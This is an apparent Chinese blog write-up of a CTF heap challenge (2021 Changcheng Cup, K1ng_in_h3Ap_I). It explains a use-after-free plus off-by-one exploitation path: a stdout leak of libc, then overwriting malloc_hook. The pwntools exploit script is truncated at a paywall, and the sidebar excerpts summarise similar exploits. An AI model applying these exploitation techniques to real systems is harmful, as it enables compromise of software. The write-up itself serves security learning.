2021 长城杯 pwn K1ng_in_h3Ap_I

最新推荐文章于 2024-07-19 09:22:52 发布
原创 最新推荐文章于 2024-07-19 09:22:52 发布 · 442 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

本文通过两个具体的实例展示了如何利用UAF(Use After Free)漏洞进行攻击,包括利用off-by-one漏洞构造攻击以及仅使用UAF漏洞攻击IO_FILE的chunk。文章详细介绍了利用这些漏洞泄露libc基址并控制malloc_hook的过程。

在这里插入图片描述libc是2.23

菜单
在这里插入图片描述

add
在这里插入图片描述

free
在这里插入图片描述显然是有uaf。

edit
在这里插入图片描述就是输入

输入函数其实还有off by one。

有个后门
在这里插入图片描述

我们的思路就是简单的说因为有uaf但是没有show,所以我们就直接攻击stdout,但是又因为后门给了我们地址,所以就解决了爆破这个问题。然后就攻击IO_FILE泄露libc,再攻击malloc_hook就好啦。

第一个exp是利用off by one来构造的。
exp

from pwn import *

r = process("./pwn1")

context.arch='amd64'

elf=ELF("./pwn1")
libc=ELF("./libc.so.6")

def add(index,size):
    r.sendlineafter(">> \n",'1')
    r.sendlineafter("input index:\n",str(index))
    r.sendlineafter("input size:\n",str(size))
def free(index):
    r.sendlineafter(">> \n",'2')
    r.sendlineafter("input index:\n",str(index))
def edit(index,context):
    r.sendlineafter(">> \n",'3')
    r.sendlineafter("input index:\n",str(index))
    r.sendlineafter("input context:\n",context)
def gift():
    r.sendlineafter(">> \n",'666')
    
gift()
stdout = int(r.recv(<
最低0.47元/天 解锁文章
yongbaoii
关注
[uaf + off by one -> stdout leak libc] 长城杯pwn1
huzai9527的博客
09-22 554
1. ida分析 存在uaf 和 off by one,可以实现任意地址写 没有show函数,且保护全开,不能修改got表 2. 思路 使用stdout爆破,泄漏libc 先申请几个chunk,通过off by one,构造chunk lapping 再通过uaf修改fd,构成任意地址写 注意点就是,想法设法构造chunk复用 uaf + off by one 总结一下就是,先del构造fastbin,再改chunk head构造unstored bin,再申请一个不是fastbin大小的chunk覆
长城杯2021 pwn
清霂的博客
09-20 985
长城杯20211.K1ng_in_h3Ap_I2.K1ng_in_h3Ap_II 菜鸡第一次在国内比赛做出两道题,害,长城杯比第五空间温柔多了,第五空间一道rop,之后就直接vm,musl都没学过,还有个c++逆向8出来。打完国赛(写了一道简单堆题,orw调一晚上没出来,服了)之后划水时间太长了,8月下旬才开始继续学堆,争取10月底前把vm,musl,mips,arm这种其他架构(不知道算不算)的pwn学习一下。 1.K1ng_in_h3Ap_I 题目给了3个字节libc地址,操作性还是挺强的,借用残留指针
2021 长城杯 pwn K1ng_in_h3Ap_II
yongbaoii的博客
09-24 316
保护全开 libc是2.27的。 开了沙箱 add 最多16个,大小最大0x60 free 显然是有个uaf edit edit就是正常输入 show 正常输出。 所以其实就是一个2.27的堆srop。 第一步是把因为开沙箱申请然后释放的chunk都从各种链中都拉走。 for i in range(8): allocate(0, 0x10) allocate(0, 0x40) for i in range(7): allocate(0, 0x60) 第二步泄露一下heap的地址。 al
长城杯线上赛WP
蚁景网安学院
09-28 1196
本文为goodcat战队参赛wp,非官方出品Pwn1、 K1ng_in_h3Ap_II libc2.27-0ubuntu1.4,存在明显的UAF;tcahce double free 控...
ycb2020babypwn(unsortedbin爆破stdout泄露)
qq_33590156的博客
12-04 522
题目没有leak函数,肯定得打stdout,但是又是个2.23,有指针没清零的漏洞 在stdout-0x43的地方有0x7f的size,而且和main_arena+88很近,最后三位固定是0x5dd,所以需要爆破第二个字节的高位,概率是1/16。这应该是没leak的通用打法 然后题目是通过double free,控制堆块,修改size进unsortedbin,然后爆破fd,申请出stdout泄露libc,最后打malloc_hook和realloc去getshell。 操作 首先肯定是double free
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
羊城杯2023 pwn-arrary_index_bank
sagic的博客
07-19 485
存在整数溢出,不可以直接改地址,因为super_ai的返回地址一定比v1高所为不行。会等于0x38呢,因为7*8产生了进位所以4被64位舍弃。程序中含有system函数初步判定可能为ret2text。地址因为是十进制所以进行转换查看是否泄漏成功。地址已经泄漏完成开始payload的搭建。cmp操作进行完比较相同为0不相同为1。接收地址-super_ai的返回地址。考虑堆栈平衡 + 0x1315。发现RAX已经变成负数。泄漏地址为rbp下一位。如何进行整数溢出呢?
2021 长城杯ctf wp
qq_45603443的博客
09-20 5739
2021 长城杯 wpMisc签到你这flag保熟吗Cryptobaby_rsaReverseJust_cmpfunny_jsWebjava_urlez_pythonPwnK1ng_in_h3Ap_IK1ng_in_h3Ap_II Misc 签到 ASCII—16进制—base64 你这flag保熟吗 下载附件,得到两张图⽚和⼀个压缩包,压缩包需要密码 从图⽚可以提取出两个rar 得到⼀个excel和⼀个hint hint中提示base64:(,还有⼀串不知所云的base64 excel中是分开来的单
nsctf_online_2019_pwn1(劫持IO_2_1_stdout来泄露地址)
seaaseesa的博客
04-30 1451
nsctf_online_2019_pwn1 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 Edit功能里存在一个null off by one漏洞 没有show功能 我们可以利用fastbin attack,修改IO_2_1_stdout的_IO_write_base,这样,当再次调用puts或printf的时候,就会泄露出_IO_write_base~_IO_...
vn_pwn_easyTHeap(堆利用+劫持IO_2_1_stdout的虚表)
seaaseesa的博客
04-09 1446
vn_pwn_easyTHeap 首先,已知libc版本为2.27,所以存在tcache机制,并且可以随意的double free tcache bin的chunk。 然后,我们检查一下程序的保护机制 然后,我们用IDA分析一下程序 存在UAF漏洞,因此可以double free,对于glibc 2.27,可以很轻松的利用 主函数里,对调用功能的次数做了限制,即add功能能...
fclose(stdout)后,如何打开stdout
Luke的学习笔记
06-15 2704
#include #include #include #include #include #include #include #include #include #include #include #define N 500 #define L 100 #define Pi acos(-1.0) #define clr(a) memset(a,0,sizeof a)
CoolShell-第4题
热门推荐
05-22 9万+
第4题地址:https://fun.coolshell.cn/furyy.html 没啥想法,输入cat试试,https://fun.coolshell.cn/cat.html。 得到了提示,但是看不懂。 因为对计算机英语不敏感,对pattern这个词没啥想法,在这里卡了很久。 查看网页源代码时,发现网页下方有一堆注释,可能这就是所谓的source。 最后是在网上搜到了解决方法…… 原来题目的意思是这样的,已知几个回文串的模式,其中标红的c、a、t是正确的格式,从s...
2021长城杯pwn部分wp
eeeeeight的博客
09-19 6517
前言: 就, 除了vmpwn都是基础glibc的heap题 king_in_heap_1: delete函数没有把free后的指针置零, 存在uaf, 然后用unsortedbin的fd指向io结构体泄露libc, 然后mallochook上用realloc调整一下, 打onegadget就完事了 #!/usr/bin/env python # coding=utf-8 from pwn import * sh=remote('47.104.175.110',20066) #sh=process('./ki
第一届“长城杯网络安全大赛 ez_python
weixin_43610673的博客
09-20 1799
利用LFI读文件 /?pic=/home/app/app.py import pickle import base64 from flask import Flask, request from flask import render_template,redirect,send_from_directory import os import requests import random from flask import send_file app = Flask(__name__) class .
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8844
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Vue+ElementUI 省区市三级联动 详细地址信息输入
12-11
下载方式:https://pan.quark.cn/s/1d76235d4464 Shanghai kejian engineering management 科健工程管理有限公司企业官网 前端 一个业余时间(三周)的外包项目 最终成品: 主分支已更新至改进版,老版本源码移至 Release 如果是学习的话推荐学习新版本 链接 另外有些同学在问后端的代码 这里 新版本改进 整体重构,结构升级为最新 vue-cli 代码优化,去除引用的静态js文件 图片加载加入懒加载,整体性能提升很大 视频采用 vue-video-player 处理兼容性 首页全屏滚动样式由静态文件 fullpage.js 改为 vue-awesome-swiper 样式调整,提升了自适应能力 组件列表 vue-router element-ui axios vue-video-player (视频组件) vue-awesome-swiper (首页滚动组件) vue-lazyload (图片懒加载) Project setup Compiles and hot-reloads for development Compiles and minifies for production Docker 使用 Docker 发布镜像至镜像服务器 镜像地址(可拉取):ccr.ccs.tencentyun.com/ifengzctest/kjweb:v1
基于改进YOLOv8模型的高精度多场景实时车牌自动识别与检测系统源码及完整解决方案_包含一条龙教学从YOLOV8标注数据集到一键训练模型再到70多种创新改进点集成与调优及Web前端.zip
12-11
基于改进YOLOv8模型的高精度多场景实时车牌自动识别与检测系统源码及完整解决方案_包含一条龙教学从YOLOV8标注数据集到一键训练模型再到70多种创新改进点集成与调优及Web前端.zip
玲珑股票A3_0.zip
最新发布
12-11
玲珑股票A3_0
pwn_deploy_chroot后会有镜像吗
10-02
用户问:“我想了解pwn_deploy_chroot操作后是否会产生镜像”,并提供了参考引用。这些引用是关于Docker和pwn环境搭建的。 关键点: - 用户的问题:pwn_deploy_chroot操作后是否会产生镜像? - 参考引用: - [^1]:...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值